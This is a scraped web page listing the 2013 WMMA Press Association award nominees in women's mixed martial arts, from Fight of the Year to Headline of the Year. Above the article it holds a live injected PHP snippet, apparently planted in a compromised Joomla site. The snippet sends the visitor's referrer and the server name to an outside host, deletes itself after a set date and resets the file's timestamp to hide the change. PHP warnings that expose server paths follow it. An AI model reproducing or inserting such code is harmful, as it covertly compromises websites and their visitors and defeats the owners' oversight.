check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456734159){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=3&id=18776849&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_search/models/models.php"); }
Warning: session_start(): Cannot send session cookie - headers already sent by (output started at /home/grant18/public_html/femalemmafighting/includes/framework.php:102) in /home/grant18/public_html/femalemmafighting/libraries/joomla/session/session.php on line 423

Warning: session_start(): Cannot send session cache limiter - headers already sent (output started at /home/grant18/public_html/femalemmafighting/includes/framework.php:102) in /home/grant18/public_html/femalemmafighting/libraries/joomla/session/session.php on line 423

Warning: Cannot modify header information - headers already sent by (output started at /home/grant18/public_html/femalemmafighting/includes/framework.php:102) in /home/grant18/public_html/femalemmafighting/libraries/joomla/session/session.php on line 426
2013 WMMA Press Awards

WMMAwards2
     AND THE WMMA PRESS ASSOCIATION 2013 NOMINEES ARE...*

 E-mail

2013 WMMA Press Awards

Share this post

2013WMMAwards
It's that time again! The WMMA Press Association has announced their 2013 Award Nominees!


The WMMA Press Association consists of the following individuals, who make up a broad spectrum of reporting and blogging on Women's MMA:

  • Robert Sargent - MMARising.com/MMA Junkie
  • Gina Begley - Pro (W)MMA Now/BluegrassMMA
  • Katrina Belcher - TheUltimateFemaleFighter.com (yours truly!)
  • Tim Peterson - Women’s MMA Today
  • Yael Grauer - MMATorch/Sherdog
  • Kristin Ursy - WMMA Round-up, and
  • MarQ Piocos - Wombat Sports/Women Talk Sports

The committee will be voting on the winners January 1st, 2014. The public is invited to vote on the Fan Favorite of the Year, which can be found on all member sites (including this one; see below!). The winners will be announced on several podcast in early January.


Here are the nominees:


Fight of the Year

  • Ronda Rousey vs Liz Carmouche at UFC 157
  • Michelle Waterson vs Jessica Penne at Invicta FC 5
  • Sarah Kaufman vs Leslie Smith at Invicta FC 5 
  • Cat Zingano vs Miesha Tate at TUF 17 Finale
  • Larissa Pacheco vs. Irene Aldana at Jungle Fights 63
  • Leslie Smith vs Jennifer Maia at Invicta FC 6
  • Tecia Torres vs Rose Namajunas at Invicta FC 6
  • Ronda Rousey vs. Miesha Tate UFC 168 (no video available)


Fighter of the Year (Nominees are winners of divisional awards)

Featherweight of the Year

  • Julia Budd (2-0, defeat Mollie Estes, Charmaine Tweet)
  • Ashlee Evans-Smith (2-0, defeat Tori Adams, Fallon Fox)
  • Cristiane “Cyborg” Justino (2-0, defeat Fiona Muxlow, Marloes Coenen)
  • Faith Van Duin (4-0, defeat Kelly Kinita, Michelle Peruzzi, Arlene Blencowe, Kate Da Silva)


Bantamweight of the Year 

  • Alexis Davis (3-0, defeat Shayna Baszler, Rosi Sexton, Liz Carmouche)
  • Holly Holm (4-0, defeat Katie Merrill, Allanna Jones, Nikki Knudsen, Angela Hayes)
  • Lauren Murphy (4-0, defeats Jen Scott, Kaitlin Young, Sarah D’Alelio, Miriam Nakamoto)
  • Ronda Rousey (1-0, defeats Miesha Tate)


Flyweight of the Year

  • Kalindra Faria (5-0, defeat Aline Sattelmayer, Dayse Nascimento, Alessandra Silva, Carina Damm, Hellen Bastos)
  • Alexa Grasso (3-0, defeat Lupita Hernadez, Alejandra Alvarez, Karina Rodriguez)
  • Barb Honchak (2-0, defeat Vanessa Porto, Leslie Smith)
  • Tina Lähdemäki (3-0, defeat Linn Wennergren, Stephanie Page, Karla Benitez)


Strawweight of the Year

  • Joanne Calderwood (4-0, defeat Livia Plettenburg, Sally Krumdiack, Norma Center, Katja Kankaanpaa)
  • Alida Gray (4-0, defeat Vidonic, Kennett, Tiem, Casimir) 
  • Mizuki Inoue (3-0, defeat Seo Jung, Bec Hyatt, Emi Fujino) 
  • Tecia Torres (3-0, defeat Paige VanZant, Rose Namajunas, Felice Herrig)


Atomweight of the Year

  • Amber Brown (1-0, defeat Kikuyo Ishikawa)
  • Seo Hee Ham (2-0, defeat Naho Sugiyama, Sadae Numata)
  • Michelle Waterson (1-0, defeat Jessica Penne)
  • Jinh Yu (2-0, defeat Meghan Wright, Darla Harris)


Newcomer of the Year

  • Amy Cadwell (3-0, defeat Cheryl Chan, Hadley Griffith, Jessica Doerner)
  • Bianca Daimoni (3-0, defeat Alessandra Silva, Morgana Oliveira, Gisele Moreira)
  • Alida Gray (4-0, defeat Patricia Vidonic, Jessica Kennett, Soannia Tiem, Katie Casimir)
  • Viviane Pereira (3-0, defeat Rosy Duarte, Ilara Joanne, Duda Yankovich)
  • Livia Renata Souza (5-0, defeat Cintia Faria, Aline Sattelmayer, Andressa Rocha, Aline Sattelmayer, Bianca Reis)
  • Faith Van Duin (4-0, defeat Kelly Kinita, Michelle Peruzzi, Arlene Blencowe, Kate Da Silva)


Amateur of the Year

  • Aspen Ladd (5-0 in 2013)
  • Kyra Batara (4-1, 3-1 in 2013)
  • Katlyn Chookagian (5-0; 4-0 in 2013)
  • Brittany Dugas (7-0; 3-0 in 2013)
  • Maegan Goodwin (4-0; 3-0 in 2013)
  • Ashley Hancock (3-0 in 2013)
  • Mary Kate Hayes (4-0 in 2013)
  • Rachel Kovach (3-0 in 2013)
  • Rachael Ostovich (6-0; 2-0 in 2013)
  • Delaney Owen (7-2; 3-1 in 2013)
  • Rach Wiley (3-1; 3-0 in 2013)
  • Jessica Zomcik (9-3; 3-0 in 2013)


KO of the Year

  • Veronica Rothenhausler defeats Katalina Malungahu via KO (punch) at 1:12 of Round 1 at Invicta FC 4
  • Vanessa Guimarães defeats Bruna Paiffer via KO (knee) at 1:44 of Round 1 at Strikers HC 25
  • Nina Ansaroff defeats Aylla Caroline da Silva via KO at 1:25 of Round 1 at PFL 10
  • Holly Holm defeats Allanna Jones via KO(head kick) at 2:22 of Round 2 at Legacy 21
  • Jinh Yu defeats Darla Harris via KO (head kick/punch) at 3:13 of Round 1 at SCS 18
  • Amanda Kelly defeats Hannah Stephens via KO (knee) at 3:40 of Round 1 at Cage Warriors 60
  • Bianca Daimoni defeats Gisele Moreira via KO(punch) at 3:06 of Round 2 at Floripa Fight 9
  • Alida Gray defeats Soannia Tiem via KO (punch) at :05 of Round 3 at 24/7 12: State of Emergency


Submission of the Year

  • Duda Yankovich defeats Daniela Cristina via Keylock at 3:59 of Round 2 at Bitetti Combat 14
  • Rose Namajunas defeats Kathina Cantron via Flying Armbar at :12 of Round 1 at Invicta FC 5
  • Jessica Andrade defeats Milana Dudieva via Guillotine Choke at 4:34 of Round 2 at ProFC 47
  • Emi Fujino defeats Amber Brown via Neck Crank at 4:18 of round 2 at Pancrase 247
  • Alexandra Buch defeats Anne Merkt via Inverted Heel Hook at 4:49 of Round 1 at No Compromises 2
  • Stephanie Eggink defeats Angela Magana via Triangle Choke at 3:10 of Round 2 at XFC 25: Boiling Point
  • Anastasia Yankova defeats Eleanor Tassinari via Scarf Hold Armlock at :26 of Round 2 at White Rex Pro
  • Tina Lähdemäki defeats Karla Benitez via Arm-Triangle Choke at 4:50 of Round 1 at Cage 24


Promotion of the Year

  • Cage Warriors Fighting Championship
  • DEEP
  • Jewels
  • Invicta Fighting Championships
  • NAAFS
  • Tuff-N-Uff
  • UFC
  • XFC


Sponsor of the Year

  • Babes of MMA
  • Brawl and Maul
  • Fight Performance Gear
  • Fear the Fighter
  • Fight Chix
  • FighterGirls
  • Loyalty Before Royalty
  • MMA Chick
  • Polanti Watches
  • Tussle Fight Gear


Headline of the Year

  • Ronda Rousey and Liz Carmouche Become First Women to Compete/Headline a UFC Event
  • Women Enter ‘The Ultimate Fighter’ House, Rousey and Zingano (Tate) to Coach
  • Julianna Pena Becomes First Women’s Ultimate Fighter
  • Cage Warriors Open Multiple Women’s Weight Divisions
  • Invicta Crowns First Champion in Carla Esparza
  • Invicta FC Crowns New Champions in All Five Weight Classes Women’s MMA
  • Pioneer’s Megumi Fujii, Hitomi Akano and Julie Kedzie Hang Up Their Gloves
  • UFC Launches Female Strawweight Division on The Ultimate Fighter, Season 20